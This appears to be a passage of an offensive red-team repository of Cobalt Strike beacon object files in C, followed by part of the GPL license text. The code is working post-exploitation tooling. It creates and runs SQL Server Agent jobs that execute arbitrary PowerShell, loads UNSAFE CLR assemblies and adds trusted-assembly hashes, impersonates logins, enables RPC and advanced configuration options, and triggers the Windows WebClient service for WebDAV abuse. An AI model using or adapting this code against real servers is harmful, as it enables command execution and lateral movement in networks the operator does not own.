SQLHDBC ConnectToSqlServer(SQLHENV *env, char *server, char *dbName) {
  return ConnectToSqlServerAuth(env, server, dbName, NULL, NULL);
}

void DisconnectSqlServer(SQLHENV env, SQLHDBC dbc, SQLHSTMT stmt) {
  SQLRETURN ret;
  internal_printf("\n[*] Disconnecting from server\n");

  if (stmt != NULL) {
    ret = ODBC32$SQLFreeHandle(SQL_HANDLE_STMT, stmt);
    if (!SQL_SUCCEEDED(ret)) {
      internal_printf("[-] Error freeing statement handle\n");
      ShowError(SQL_HANDLE_STMT, stmt);
    }
  }

  if (dbc != NULL) {
    ret = ODBC32$SQLDisconnect(dbc);
    if (!SQL_SUCCEEDED(ret)) {
      internal_printf("[-] Error disconnecting from server\n");
      ShowError(SQL_HANDLE_DBC, dbc);
    }

    ret = ODBC32$SQLFreeHandle(SQL_HANDLE_DBC, dbc);
    if (!SQL_SUCCEEDED(ret)) {
      internal_printf("[-] Error freeing connection handle\n");
      ShowError(SQL_HANDLE_DBC, dbc);
    }
  }

  if (env != NULL) {
    ret = ODBC32$SQLFreeHandle(SQL_HANDLE_ENV, env);
    if (!SQL_SUCCEEDED(ret)) {
      internal_printf("[-] Error freeing environment handle\n");
      ShowError(SQL_HANDLE_ENV, env);
    }
  }
}

================================================
FILE: AD-BOF/SQL-BOF/src/common/sql_agent.c
================================================
#include "bofdefs.h"
#include "sql.h"


BOOL IsAgentRunning(SQLHSTMT stmt, char* link, char* impersonate)
{
    BOOL running = FALSE;

    char* query = "SELECT dss.[status_desc] FROM sys.dm_server_services dss "
                  "WHERE dss.[servicename] LIKE 'SQL Server Agent (%';";
    
    if (!HandleQuery(stmt, (SQLCHAR*)query, link, impersonate, FALSE))
    {
        internal_printf("[-] Error while querying SQL Server Agent status\n");
        return FALSE;
    }

    char* result = GetSingleResult(stmt, FALSE);
    
    if (result != NULL && MSVCRT$strcmp(result, "Running") == 0)
    {
        running = TRUE;
    }

    intFree(result);
    return running;
}

BOOL GetAgentJobs(SQLHSTMT stmt, char* link, char* impersonate)
{
    char* query = "SELECT job_id, name, enabled, date_created, date_modified "
                  "FROM msdb.dbo.sysjobs ORDER BY date_created";

    return HandleQuery(stmt, (SQLCHAR*)query, link, impersonate, FALSE);
}

BOOL AddAgentJob(SQLHSTMT stmt, char* link, char* impersonate, char* command, char* jobName, char* stepName)
{

    char* part1 = "use msdb; EXEC dbo.sp_add_job @job_name = '";
    char* part2 = "'; EXEC sp_add_jobstep @job_name = '";
    char* part3 = "', @step_name = '";
    char* part4 = "', @subsystem = 'PowerShell', @command = '";
    char* part5 = "', @retry_attempts = 1, @retry_interval = 5; EXEC dbo.sp_add_jobserver @job_name = '";
    char* part6 = "';";

    size_t totalSize = MSVCRT$strlen(part1) + MSVCRT$strlen(jobName) + MSVCRT$strlen(part2) + MSVCRT$strlen(jobName) + MSVCRT$strlen(part3) + MSVCRT$strlen(stepName) + MSVCRT$strlen(part4) + MSVCRT$strlen(command) + MSVCRT$strlen(part5) + MSVCRT$strlen(jobName) + MSVCRT$strlen(part6) + 1;
    char* query = (char*)intAlloc(totalSize);

    MSVCRT$strcpy(query, part1);
    MSVCRT$strncat(query, jobName,  totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, part2,    totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, jobName,  totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, part3,    totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, stepName, totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, part4,    totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, command,  totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, part5,    totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, jobName,  totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, part6,    totalSize - MSVCRT$strlen(query) - 1);

    BOOL result = HandleQuery(stmt, (SQLCHAR*)query, link, impersonate, TRUE);
    intFree(query);
    return result;
}

BOOL ExecuteAgentJob(SQLHSTMT stmt, char* link, char* impersonate, char* jobName)
{
    char* prefix = "use msdb; EXEC dbo.sp_start_job @job_name = '";
    char* suffix = "'; WAITFOR DELAY '00:00:05';";

    size_t totalSize = MSVCRT$strlen(prefix) + MSVCRT$strlen(jobName) + MSVCRT$strlen(suffix) + 1;
    char* query = (char*)intAlloc(totalSize);

    MSVCRT$strcpy(query, prefix);
    MSVCRT$strncat(query, jobName,  totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, suffix,   totalSize - MSVCRT$strlen(query) - 1);

    BOOL result = HandleQuery(stmt, (SQLCHAR*)query, link, impersonate, TRUE);
    intFree(query);
    return result;
}

BOOL DeleteAgentJob(SQLHSTMT stmt, char* link, char* impersonate, char* jobName)
{
    //char* use = "use msdb;"; 
    //if (!HandleQuery(stmt, (SQLCHAR*)use, link, impersonate, TRUE))
    //{
    //    internal_printf("[-] Error while setting msdb as the current database\n");
    //    return FALSE;
    //}

    char* prefix = "use msdb; EXEC dbo.sp_delete_job @job_name = '";
    char* suffix = "';";

    size_t totalSize = MSVCRT$strlen(prefix) + MSVCRT$strlen(jobName) + MSVCRT$strlen(suffix) + 1;
    char* query = (char*)intAlloc(totalSize);

    MSVCRT$strcpy(query, prefix);
    MSVCRT$strncat(query, jobName,  totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, suffix,   totalSize - MSVCRT$strlen(query) - 1);

    BOOL result = HandleQuery(stmt, (SQLCHAR*)query, link, impersonate, TRUE);
    intFree(query);
    return result;
}



================================================
FILE: AD-BOF/SQL-BOF/src/common/sql_clr.c
================================================
//
// imported by bof entry files utilizing CLR functionality
// include statmenet should be after the sql.c include
//
#include <windows.h>
#include <sql.h>
#include "bofdefs.h"

BOOL AssemblyHashExists(SQLHSTMT stmt, char* hash, char* link, char* impersonate)
{
    BOOL exists = FALSE;
    
    char* prefix = "SELECT * FROM sys.trusted_assemblies WHERE hash = 0x";
    char* suffix = ";";

    size_t totalSize = MSVCRT$strlen(prefix) + MSVCRT$strlen(hash) + MSVCRT$strlen(suffix) + 1;
    char* query = (char*)intAlloc(totalSize * sizeof(char));

    MSVCRT$strcpy(query, prefix);
    MSVCRT$strncat(query, hash, totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, suffix, totalSize - MSVCRT$strlen(query) - 1);

    if (!HandleQuery(stmt, (SQLCHAR*)query, link, impersonate, FALSE))
    {
        internal_printf("[-] Error determining if assmebly hash exists\n");
        intFree(query);
        return TRUE;
    }
    
    char* resultHash = GetSingleResult(stmt, FALSE);
    
    //
    // if we have any result, the hash exists
    //
    if (resultHash != NULL)
    {
        exists = TRUE;
    }
    else
    {
        internal_printf("[*] Assembly hash does not exist (error fetching result normal)\n");
    }
    
    intFree(query);
    intFree(resultHash);
    return exists;
}

BOOL AddTrustedAssembly(SQLHSTMT stmt, char* dllPath, char* hash, char* link, char* impersonate)
{
    char* prefix    = "EXEC sp_add_trusted_assembly 0x";
    char* mid       = ",N'";
    char* suffix    = ", version=0.0.0.0, culture=neutral, publickeytoken=null, processorarchitecture=msil';";

    size_t totalSize = MSVCRT$strlen(prefix) + MSVCRT$strlen(hash) + MSVCRT$strlen(mid) + MSVCRT$strlen(dllPath) + MSVCRT$strlen(suffix) + 1;
    char* query = (char*)intAlloc(totalSize * sizeof(char));

    MSVCRT$strcpy(query, prefix);
    MSVCRT$strncat(query, hash,     totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, mid,      totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, dllPath,  totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, suffix,   totalSize - MSVCRT$strlen(query) - 1);

    BOOL result = HandleQuery(stmt, (SQLCHAR*)query, link, impersonate, TRUE);
    intFree(query);
    return result;
}

BOOL DeleteTrustedAssemblyResources(SQLHSTMT stmt, char* assemblyName, char* function, BOOL isFunction, char* link, char* impersonate)
{
    char* drop_proc;
    char* prefix;
    char* query;
    char* suffix = ";";

    //
    // DROP FUNCTION
    //
    if (isFunction)
    {
        prefix = "DROP FUNCTION IF EXISTS ";
    }
    else
    {
        prefix = "DROP PROCEDURE IF EXISTS ";
    }


    size_t totalSize = MSVCRT$strlen(prefix) + MSVCRT$strlen(function) + MSVCRT$strlen(suffix) + 1;
    query = (char*)intAlloc(totalSize * sizeof(char));

    MSVCRT$strcpy(query, prefix);
    MSVCRT$strncat(query, function, totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, suffix,   totalSize - MSVCRT$strlen(query) - 1);


    if (!HandleQuery(stmt, (SQLCHAR*)query, link, impersonate, TRUE))
    {
        internal_printf("[-] Error dropping function\n");
        intFree(query);
        return FALSE;
    }

    intFree(query);

    //
    // DROP ASSEMBLY
    //
    char* asmPrefix = "DROP ASSEMBLY IF EXISTS ";
    totalSize = MSVCRT$strlen(asmPrefix) + MSVCRT$strlen(assemblyName) + MSVCRT$strlen(suffix) + 1;
    query = (char*)intAlloc(totalSize * sizeof(char));

    MSVCRT$strcpy(query, asmPrefix);
    MSVCRT$strncat(query, assemblyName, totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, suffix,       totalSize - MSVCRT$strlen(query) - 1);

    BOOL result = HandleQuery(stmt, (SQLCHAR*)query, link, impersonate, TRUE);
    intFree(query);
    return result;
}

BOOL DeleteTrustedAssembly(SQLHSTMT stmt, char* hash, char* link, char* impersonate)
{
    char* prefix = "EXEC sp_drop_trusted_assembly 0x";
    char* suffix = ";";

    size_t totalSize = MSVCRT$strlen(prefix) + MSVCRT$strlen(hash) + MSVCRT$strlen(suffix) + 1;
    char* query = (char*)intAlloc(totalSize * sizeof(char));

    MSVCRT$strcpy(query, prefix);
    MSVCRT$strncat(query, hash,     totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, suffix,   totalSize - MSVCRT$strlen(query) - 1);

    BOOL result = HandleQuery(stmt, (SQLCHAR*)query, link, impersonate, TRUE);
    intFree(query);
    return result;
}

BOOL AssemblyExists(SQLHSTMT stmt, char* assemblyName, char* link, char* impersonate)
{
    BOOL exists;
    char* prefix = "SELECT * FROM sys.assemblies WHERE name = '";
    char* suffix = "';";

    size_t totalSize = MSVCRT$strlen(prefix) + MSVCRT$strlen(assemblyName) + MSVCRT$strlen(suffix) + 1;
    char* query = (char*)intAlloc(totalSize * sizeof(char));

    MSVCRT$strcpy(query, prefix);
    MSVCRT$strncat(query, assemblyName, totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, suffix,       totalSize - MSVCRT$strlen(query) - 1);

    if (!HandleQuery(stmt, (SQLCHAR*)query, link, impersonate, FALSE))
    {
        internal_printf("[-] Error determining if assmebly exists\n");
        intFree(query);
        return TRUE;
    }
    
    char* resultHash = GetSingleResult(stmt, FALSE);
    
    if (MSVCRT$strcmp(resultHash, assemblyName) == 0)
    {
        exists = TRUE;
    }
    else
    {
        exists = FALSE;
    }

    ODBC32$SQLCloseCursor(stmt);
    intFree(query);
    intFree(resultHash);
    return exists;
}

BOOL CreateAssembly(SQLHSTMT stmt, char* assemblyName, char* dllBytes, char* link, char* impersonate)
{
    char* prefix = "CREATE ASSEMBLY ";
    char* mid = " FROM 0x";
    char* suffix = " WITH PERMISSION_SET = UNSAFE;";

    size_t totalSize = MSVCRT$strlen(prefix) + MSVCRT$strlen(assemblyName) + MSVCRT$strlen(mid) + MSVCRT$strlen(dllBytes) + MSVCRT$strlen(suffix) + 1;
    char* query = (char*)intAlloc(totalSize * sizeof(char));

    MSVCRT$strcpy(query, prefix);
    MSVCRT$strncat(query, assemblyName, totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, mid,          totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, dllBytes,     totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, suffix,       totalSize - MSVCRT$strlen(query) - 1);

    BOOL result = HandleQuery(stmt, (SQLCHAR*)query, link, impersonate, TRUE);
    intFree(query);
    return result;
}

BOOL AssemblyStoredProcExists(SQLHSTMT stmt, char* function, char* link, char* impersonate)
{
    char* prefix = "SELECT name FROM sys.procedures WHERE type = 'PC' AND name = '";
    char* suffix = "';";

    size_t totalSize = MSVCRT$strlen(prefix) + MSVCRT$strlen(function) + MSVCRT$strlen(suffix) + 1;
    char* query = (char*)intAlloc(totalSize * sizeof(char));

    MSVCRT$strcpy(query, prefix);
    MSVCRT$strncat(query, function, totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, suffix,   totalSize - MSVCRT$strlen(query) - 1);

    if (!HandleQuery(stmt, (SQLCHAR*)query, link, impersonate, FALSE))
    {
        internal_printf("[-] Error determining if stored procedure exists\n");
        intFree(query);
        return TRUE;
    }

    char* result = GetSingleResult(stmt, FALSE);
    BOOL exists = (MSVCRT$strcmp(result, function) == 0) ? TRUE : FALSE;
    
    ODBC32$SQLCloseCursor(stmt);
    intFree(query);
    intFree(result);
    
    return exists;
}

BOOL AssemblyFunctionExists(SQLHSTMT stmt, char* function, char* link, char* impersonate)
{
    char* prefix = "SELECT assembly_class FROM sys.assembly_modules WHERE assembly_class = '";
    char* suffix = "';";

    size_t totalSize = MSVCRT$strlen(prefix) + MSVCRT$strlen(function) + MSVCRT$strlen(suffix) + 1;
    char* query = (char*)intAlloc(totalSize * sizeof(char));

    MSVCRT$strcpy(query, prefix);
    MSVCRT$strncat(query, function, totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, suffix,   totalSize - MSVCRT$strlen(query) - 1);

    if (!HandleQuery(stmt, (SQLCHAR*)query, link, impersonate, FALSE))
    {
        internal_printf("[-] Error determining if function exists\n");
        intFree(query);
        return TRUE;
    }

    char* result = GetSingleResult(stmt, FALSE);
    BOOL exists = (MSVCRT$strcmp(result, function) == 0) ? TRUE : FALSE;

    intFree(query);
    intFree(result);

    return exists;
}

BOOL CreateAssemblyStoredProc(SQLHSTMT stmt, char* assemblyName, char* function, BOOL Adsi, char* link, char* impersonate)
{
    char* query = NULL;

    if (Adsi)
    {
        //
        // for ADSI BOF
        //
        char* prefix    = "CREATE FUNCTION [dbo].";
        char* part2     = "(@port int) RETURNS NVARCHAR(MAX) AS EXTERNAL NAME ";
        char* suffix    = ".[ldapAssembly.LdapSrv].listen;";

        size_t totalSize = MSVCRT$strlen(prefix) + MSVCRT$strlen(function) + MSVCRT$strlen(part2) + MSVCRT$strlen(assemblyName) + MSVCRT$strlen(suffix) + 1;
        query = (char*)intAlloc(totalSize * sizeof(char));

        MSVCRT$strcpy(query, prefix);
        MSVCRT$strncat(query, function,     totalSize - MSVCRT$strlen(query) - 1);
        MSVCRT$strncat(query, part2,        totalSize - MSVCRT$strlen(query) - 1);
        MSVCRT$strncat(query, assemblyName, totalSize - MSVCRT$strlen(query) - 1);
        MSVCRT$strncat(query, suffix,       totalSize - MSVCRT$strlen(query) - 1);
    }
    else
    {
        //
        // for CLR BOF
        //
        char* prefix    = "CREATE PROCEDURE [dbo].[";
        char* part2     = "] AS EXTERNAL NAME [";
        char* part3     = "].[StoredProcedures].[";
        char* suffix    = "];";

        size_t totalSize = MSVCRT$strlen(prefix) + MSVCRT$strlen(function) + MSVCRT$strlen(part2) + MSVCRT$strlen(assemblyName) + MSVCRT$strlen(part3) + MSVCRT$strlen(function) + MSVCRT$strlen(suffix) + 1;
        query = (char*)intAlloc(totalSize * sizeof(char));

        MSVCRT$strcpy(query, prefix);
        MSVCRT$strncat(query, function,     totalSize - MSVCRT$strlen(query) - 1);
        MSVCRT$strncat(query, part2,        totalSize - MSVCRT$strlen(query) - 1);
        MSVCRT$strncat(query, assemblyName, totalSize - MSVCRT$strlen(query) - 1);
        MSVCRT$strncat(query, part3,        totalSize - MSVCRT$strlen(query) - 1);
        MSVCRT$strncat(query, function,     totalSize - MSVCRT$strlen(query) - 1);
        MSVCRT$strncat(query, suffix,       totalSize - MSVCRT$strlen(query) - 1);
    }

    //
    // special case for impersonation here
    // CREATE PROCEDURE statements are not allowed in a batch with other statements
    //
    BOOL result;
    if (impersonate != NULL)
    {
        char* iPrefix = "EXECUTE AS LOGIN = '";
        char* iSuffix = "';";

        size_t totalSize = MSVCRT$strlen(iPrefix) + MSVCRT$strlen(impersonate) + MSVCRT$strlen(iSuffix) + 1;
        char* impersonateQuery = (char*)intAlloc(totalSize * sizeof(char));

        MSVCRT$strcpy(impersonateQuery, iPrefix);
        MSVCRT$strncat(impersonateQuery, impersonate, totalSize - MSVCRT$strlen(impersonateQuery) - 1);
        MSVCRT$strncat(impersonateQuery, iSuffix, totalSize - MSVCRT$strlen(impersonateQuery) - 1);

        if (!ExecuteQuery(stmt, (SQLCHAR*)impersonateQuery))
        {
            internal_printf("[-] Error impersonating user\n");
            intFree(impersonateQuery);
            return FALSE;
        }
        
        intFree(impersonateQuery);
        result = ExecuteQuery(stmt, (SQLCHAR*)query);
    }
    else
    {
        result = HandleQuery(stmt, (SQLCHAR*)query, link, NULL, TRUE);
    }
    intFree(query);
    return result;
}

BOOL ExecuteAssemblyStoredProc(SQLHSTMT stmt, char* function, char* link, char* impersonate)
{
    char* prefix = "EXEC ";
    char* suffix = ";";

    size_t totalSize = MSVCRT$strlen(prefix) + MSVCRT$strlen(function) + MSVCRT$strlen(suffix) + 1;
    char* query = (char*)intAlloc(totalSize * sizeof(char));

    MSVCRT$strcpy(query, prefix);
    MSVCRT$strncat(query, function, totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, suffix,   totalSize - MSVCRT$strlen(query) - 1);

    BOOL result = HandleQuery(stmt, (SQLCHAR*)query, link, impersonate, TRUE);
    intFree(query);
    return result;
}

================================================
FILE: AD-BOF/SQL-BOF/src/common/sql_modules.c
================================================
//
// imported by bof entry files to check or toggle status of modules
// include statmenet should be after the sql.c include
//
#include <windows.h>
#include <sql.h>
#include "bofdefs.h"

//
// Configure sp_serveroption or sp_configure
//
BOOL ToggleModule(SQLHSTMT stmt, char* name, char* value, char* link, char* impersonate) {
    char* query = NULL;
    size_t totalSize;
    SQLRETURN ret;

    if (MSVCRT$strcmp(name, "rpc") == 0)
    {
        char* prefix = "EXEC sp_serveroption '";
        char* middle = "', 'rpc out', '";
        char* suffix = "';";

        totalSize = MSVCRT$strlen(prefix) + MSVCRT$strlen(link) + MSVCRT$strlen(middle) + MSVCRT$strlen(value) + MSVCRT$strlen(suffix) + 1;
        query = (char*)intAlloc(totalSize * sizeof(char));

        MSVCRT$strcpy(query, prefix);
        MSVCRT$strncat(query, link,     totalSize - MSVCRT$strlen(query) - 1);
        MSVCRT$strncat(query, middle,   totalSize - MSVCRT$strlen(query) - 1);
        MSVCRT$strncat(query, value,    totalSize - MSVCRT$strlen(query) - 1);
        MSVCRT$strncat(query, suffix,   totalSize - MSVCRT$strlen(query) - 1);

        //
        // link will always be passed as NULL here
        //
        BOOL result = HandleQuery(stmt, (SQLCHAR*)query, NULL, impersonate, FALSE);

        intFree(query);

        return result;
    }
    else
    {
        char* reconfigure = "RECONFIGURE;";
        char* advOpts = "EXEC sp_configure 'show advanced options', 1;";
        
        //
        // setting TRUE for using rpc query
        //
        if (!HandleQuery(stmt, (SQLCHAR*)advOpts, link, impersonate, TRUE))
        {
            return FALSE;
        }


        //
        // Clear the cursor
        //
        ClearCursor(stmt);

        //
        // Reconfigure
        //
        if (!HandleQuery(stmt, (SQLCHAR*)reconfigure, link, impersonate, TRUE))
        {
            return FALSE;
        }

        //
        // Clear the cursor
        //
        ClearCursor(stmt);

        //
        // toggle on or off
        //
        char* prefix = "EXEC sp_configure '";
        char* middle = "', ";
        char* suffix = ";";
        
        totalSize = MSVCRT$strlen(prefix) + MSVCRT$strlen(name) + MSVCRT$strlen(middle) + MSVCRT$strlen(value) + MSVCRT$strlen(suffix) + 1;
        query = (char*)intAlloc(totalSize * sizeof(char));

        MSVCRT$strcpy(query, prefix);
        MSVCRT$strncat(query, name,     totalSize - MSVCRT$strlen(query) - 1);
        MSVCRT$strncat(query, middle,   totalSize - MSVCRT$strlen(query) - 1);
        MSVCRT$strncat(query, value,    totalSize - MSVCRT$strlen(query) - 1);
        MSVCRT$strncat(query, suffix,   totalSize - MSVCRT$strlen(query) - 1);

        if (!HandleQuery(stmt, (SQLCHAR*)query, link, impersonate, TRUE))
        {
            intFree(query);
            return FALSE;
        }

        //
        // Clear the cursor
        //
        ClearCursor(stmt);

        //
        // Reconfigure
        //
        BOOL result = HandleQuery(stmt, (SQLCHAR*)reconfigure, link, impersonate, TRUE);

        intFree(query);

        return result;
    }
}

//
// Query the status of RPC on a linked server
//
BOOL CheckRpcOnLink(SQLHSTMT stmt, char* link, char* impersonate)
{
    char* prefix = "SELECT is_rpc_out_enabled FROM sys.servers WHERE lower(name) like '%";
    char* suffix = "%';";

    size_t totalSize = MSVCRT$strlen(prefix) + MSVCRT$strlen(link) + MSVCRT$strlen(suffix) + 1;
    char* query = (char*)intAlloc(totalSize * sizeof(char));

    MSVCRT$strcpy(query, prefix);
    MSVCRT$strncat(query, link,     totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, suffix,    totalSize - MSVCRT$strlen(query) - 1);

    BOOL result = HandleQuery(stmt, (SQLCHAR*)query, NULL, impersonate, FALSE);

    intFree(query);

    return result;
}

//
// Used to verify rpc status before executing a rpc linked query
//
BOOL IsRpcEnabled(SQLHSTMT stmt, char* link)
{
    BOOL enabled;

    char* prefix = "SELECT is_rpc_out_enabled "
                   "FROM sys.servers WHERE name = '";
    char* suffix = "';";

    size_t totalSize = MSVCRT$strlen(prefix) + MSVCRT$strlen(link) + MSVCRT$strlen(suffix) + 1;
    char* query = (char*)intAlloc(totalSize * sizeof(char));
    
    MSVCRT$strcpy(query, prefix);
    MSVCRT$strncat(query, link, totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, suffix, totalSize - MSVCRT$strlen(query) - 1);

    if (!HandleQuery(stmt, (SQLCHAR*)query, NULL, NULL, FALSE))
    {
        intFree(query);
        return FALSE;
    }

    char* result = GetSingleResult(stmt, FALSE);
    
    if (result[0] == '1')
    {
        enabled = TRUE;
    }
    else
    {
        enabled = FALSE;
    }

    intFree(query);
    intFree(result);

    return enabled;
}

//
// Execute query and hold results for printing
//
BOOL CheckModuleStatus(SQLHSTMT stmt, char* name, char* link, char* impersonate)
{
    char* prefix = "SELECT CAST(name AS NVARCHAR(128)) AS name, "
                   "CAST(value_in_use AS INT) AS value_in_use\n"
                   "FROM sys.configurations\n"
                   "WHERE name = '";
    char* suffix = "';";

    size_t totalSize = MSVCRT$strlen(prefix) + MSVCRT$strlen(name) + MSVCRT$strlen(suffix) + 1;
    char* query = (char*)intAlloc(totalSize * sizeof(char));
    
    MSVCRT$strcpy(query, prefix);
    MSVCRT$strncat(query, name, totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, suffix, totalSize - MSVCRT$strlen(query) - 1);

    BOOL result = HandleQuery(stmt, (SQLCHAR*)query, link, impersonate, FALSE);

    intFree(query);

    return result;
}

//
// Used to verify module status before executing
//
BOOL IsModuleEnabled(SQLHSTMT stmt, char* name, char* link, char* impersonate)
{
    BOOL enabled;

    char* prefix = "SELECT CAST(value_in_use AS INT) AS value_in_use "
                  "FROM sys.configurations "
                  "WHERE name = '";
    char* suffix = "';";

    size_t totalSize = MSVCRT$strlen(prefix) + MSVCRT$strlen(name) + MSVCRT$strlen(suffix) + 1;
    char* query = (char*)intAlloc(totalSize * sizeof(char));
    
    MSVCRT$strcpy(query, prefix);
    MSVCRT$strncat(query, name, totalSize - MSVCRT$strlen(query) - 1);
    MSVCRT$strncat(query, suffix, totalSize - MSVCRT$strlen(query) - 1);

    if (!HandleQuery(stmt, (SQLCHAR*)query, link, impersonate, FALSE))
    {
        return FALSE;
    }

    char* result = GetSingleResult(stmt, FALSE);
    
    if (result[0] == '1')
    {
        enabled = TRUE;
    }
    else
    {
        enabled = FALSE;
    }

    intFree(query);
    intFree(result);

    return enabled;
}

================================================
FILE: AD-BOF/WebDAVClient/EnableWebDAVClient.c
================================================
#include <windows.h>
#include <evntprov.h>
#include "beacon.h"

// EnableWebDAVClient Code based on https://pentestlab.blog/tag/webdav/page/2/

//ADVAPI32
DECLSPEC_IMPORT ULONG EVNTAPI ADVAPI32$EventRegister(LPCGUID ProviderId, PENABLECALLBACK EnableCallback, PVOID CallbackContext, PREGHANDLE RegHandle);
DECLSPEC_IMPORT ULONG EVNTAPI ADVAPI32$EventWrite(REGHANDLE RegHandle, PCEVENT_DESCRIPTOR EventDescriptor, ULONG UserDataCount, PEVENT_DATA_DESCRIPTOR UserData);
DECLSPEC_IMPORT ULONG EVNTAPI ADVAPI32$EventUnregister(REGHANDLE RegHandle);

VOID go(char* args, int length)
{
    REGHANDLE RegistrationHandle;
    const GUID _MS_Windows_WebClntLookupServiceTrigger_Provider = { 0x22B6D684, 0xFA63, 0x4578, { 0x87, 0xC9, 0xEF, 0xFC, 0xBE, 0x66, 0x43, 0xC7 } };
    ULONG status = ADVAPI32$EventRegister(&_MS_Windows_WebClntLookupServiceTrigger_Provider,NULL, NULL, &RegistrationHandle);
    if (status == ERROR_SUCCESS) {
        EVENT_DESCRIPTOR desc;
        EventDescCreate(&desc, 1, 0, 0, 4, 0, 0, 0);
        status = ADVAPI32$EventWrite(RegistrationHandle, &desc, 0, NULL);
        if (status == ERROR_SUCCESS)
            ADVAPI32$EventUnregister(RegistrationHandle);
        else
            BeaconPrintf(CALLBACK_ERROR, "Failed to write event with status = 0x%x\n", status);
    }else{
        BeaconPrintf(CALLBACK_ERROR, "Failed to register event with status = 0x%x\n", status);
    }
    BeaconPrintf(CALLBACK_OUTPUT, "WebClient Service Enabled! \n");
}

================================================
FILE: AD-BOF/WebDAVClient/LICENSE
================================================
                    GNU GENERAL PUBLIC LICENSE
                       Version 3, 29 June 2007

 Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
 Everyone is permitted to copy and distribute verbatim copies
 of this license document, but changing it is not allowed.

                            Preamble

  The GNU General Public License is a free, copyleft license for
software and other kinds of works.

  The licenses for most software and other practical works are designed
to take away your freedom to share and change the works.  By contrast,
the GNU General Public License is intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users.  We, the Free Software Foundation, use the
GNU General Public License for most of our software; it applies also to
any other work released this way by its authors.  You can apply it to
your programs, too.

  When we speak of free software, we are referring to freedom, not
price.  Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.

  To protect your rights, we need to prevent others from denying you
these rights or asking you to surrender the rights.  Therefore, you have
certain responsibilities if you distribute copies of the software, or if
you modify it: responsibilities to respect the freedom of others.

  For example, if you distribute copies of such a program, whether
gratis or for a fee, you must pass on to the recipients the same
freedoms that you received.  You must make sure that they, too, receive
or can get the source code.  And you must show them these terms so they
know their rights.

  Developers that use the GNU GPL protect your rights with two steps:
(1) assert copyright on the software, and (2) offer you this License
giving you legal permission to copy, distribute and/or modify it.

  For the developers' and authors' protection, the GPL clearly explains
that there is no warranty for this free software.  For both users' and
authors' sake, the GPL requires that modified versions be marked as
changed, so that their problems will not be attributed erroneously to
authors of previous versions.

  Some devices are designed to deny users access to install or run
modified versions of the software inside them, although the manufacturer
can do so.  This is fundamentally incompatible with the aim of
protecting users' freedom to change the software.  The systematic
pattern of such abuse occurs in the area of products for individuals to
use, which is precisely where it is most unacceptable.  Therefore, we
have designed this version of the GPL to prohibit the practice for those
products.  If such problems arise substantially in other domains, we
stand ready to extend this provision to those domains in future versions
of the GPL, as needed to protect the freedom of users.

  Finally, every program is threatened constantly by software patents.
States should not allow patents to restrict development and use of
software on general-purpose computers, but in those that do, we wish to
avoid the special danger that patents applied to a free program could
make it effectively proprietary.  To prevent this, the GPL assures that
patents cannot be used to render the program non-free.

  The precise terms and conditions for copying, distribution and
modification follow.

                       TERMS AND CONDITIONS

  0. Definitions.

  "This License" refers to version 3 of the GNU General Public License.

  "Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.

  "The Program" refers to any copyrightable work licensed under this
License.  Each licensee is addressed as "you".  "Licensees" and
"recipients" may be individuals or organizations.

  To "modify" a work means to copy from or adapt all or part of the work
in a fashion requiring copyright permission, other than the making of an
exact copy.  The resulting work is called a "modified version" of the
earlier work or a work "based on" the earlier work.

  A "covered work" means either the unmodified Program or a work based
on the Program.

  To "propagate" a work means to do anything with it that, without
permission, would make you directly or secondarily liable for
infringement under applicable copyright law, except executing it on a
computer or modifying a private copy.  Propagation includes copying,
distribution (with or without modification), making available to the
public, and in some countries other activities as well.

  To "convey" a work means any kind of propagation that enables other
parties to make or receive copies.  Mere interaction with a user through
a computer network, with no transfer of a copy, is not conveying.

  An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
feature that (1) displays an appropriate copyright notice, and (2)
tells the user that there is no warranty for the work (except to the
extent that warranties are provided), that licensees may convey the
work under this License, and how to view a copy of this License.  If
the interface presents a list of user commands or options, such as a
menu, a prominent item in the list meets this criterion.

  1. Source Code.

  The "source code" for a work means the preferred form of the work
for making modifications to it.  "Object code" means any non-source
form of a work.

  A "Standard Interface" means an interface that either is an official
standard defined by a recognized standards body, or, in the case of
interfaces specified for a particular programming language, one that
is widely used among developers working in that language.

  The "System Libraries" of an executable work include anything, other
than the work as a whole, that (a) is included in the normal form of
packaging a Major Component, but which is not part of that Major
Component, and (b) serves only to enable use of the work with that
Major Component, or to implement a Standard Interface for which an
